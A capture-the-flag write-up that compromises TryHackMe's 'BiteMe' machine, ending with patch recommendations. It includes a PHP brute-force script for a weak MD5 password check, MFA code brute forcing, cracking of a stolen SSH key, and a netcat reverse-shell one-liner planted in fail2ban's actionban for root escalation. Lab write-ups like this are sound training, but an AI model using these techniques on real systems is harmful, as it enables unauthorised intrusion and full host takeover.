---
title: "Writeup - BiteMe (THM)"
date: 2022-03-21
slug: "writeup-biteme-thm"
type: "writeup-ctf"
--- 

This is a writeup for the [Biteme](https://tryhackme.com/room/biteme) machine from the TryHackMe site.

## Enumeration

First, let's start with a scan of our target with the following command:


```bash
nmap -sV 10.10.31.162
```
Two TCP ports are discovered:

![](img/image-1.webp)

- 22/tcp : SSH port (OpenSSH 7.6p1)
- 80/tcp : HTTP web server (Apache 2.4.29)

## Exploit

First of all I start with a scan of the website pages.

![](img/image-2.webp)

Nothing special, let's try to do the same scan but with a focus on ".php" pages.

![](img/image-3.webp)

Ok, now there are a number of pages, including the "dashboard.php" page which gives us access to a login form.

![](img/image-4.webp)

The page "config.php" which gives us information about a connection identifier.


```bash
 <?php

define('LOGIN_USER', '6a61736f6e5f746573745f6163636f756e74'); 
```
The function.php page that gives us the function that checks the password of the connection form.


```bash
 <?php
include('config.php');

function is_valid_user($user) {
    $user = bin2hex($user);

    return $user === LOGIN_USER;
}

// @fred let's talk about ways to make this more secure but still flexible
function is_valid_pwd($pwd) {
    $hash = md5($pwd);

    return substr($hash, -3) === '001';
} 
```
Now that we have all this information, we can start working. First of all with a hexa decoder we find the nickname "jason\_test\_account".

Then with the function we can create the following script to determine a working password:


```bash
<?php
$wordlist = fopen('wordlist/rockyou.txt', 'r');

while (($l = fgets($wordlist)) !== false) {
        $hash = md5(trim($l));
        if (substr($hash, -3) === '001') {
                echo $l;
                break;
        }
}
fclose($wordlist);
```
![](img/image-5.webp)

We can now log in, but it is not finished. The page now asks us for an MFA code. Intercepting the server's response, we find the following in the source code.

![](img/image-6.webp)

This tells us that it is possible to brute force the MFA code, as no anti brute force function is in place. To realize the brute I create in a first time the dictionary of the possibilities with the following command:


```bash
crunch 4 4 0123456789 -o mfa
```
Then with Burp Intruder, I test all the possibilities!

I now have access to a page that allows me to see the contents of a folder, or the contents of a file.  So I want to get the id\_rsa of the user Jason to connect in SSH.

![](img/image-7.webp)

But we have a problem : the RSA key is encrypted with a password. To find the password, I use the following commands:

![](img/image-8.webp)

I can now connect in SSH with the user Jason and get the first flag.


```bash
chmod 600 id.jason
ssh -i id.jason jason@10.10.31.162
```
## Privilege escalation

For elevation of privilege, I start by checking the permissions with the "suso -l" command.

![](img/image-9.webp)

I observe that the user Fred has permissions to use the sudo command without a password. So I switch users to find out more.

![](img/image-10.webp)

It turns out that this user can use the command "sudo /bin/systemctl restart fail2ban" without password. This is interesting because in the fail2ban configuration files, you can define commands that will be executed in certain situations. Knowing that the fail2ban service is running with root rights, the commands will be executed as root!

So I go into the "iptables-multiport.conf" file to add commands to get a reverse shell :


```bash
actionban = rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.18.67.218 1234 >/tmp/f
```
I then run the following command to restart fail2ban:


```bash
sudo systemctl restart fail2ban
```
I now have a root shell and I can get the last flag!

![](img/image-11.webp)

## Recommendations

To patch this host I think it would be necessary to perform a number of actions:

- Do not allow access to .phps pages
- Use a real password verification function
- Implement an anti-brute force function for the MFA page
- Don't let sudo be used without a password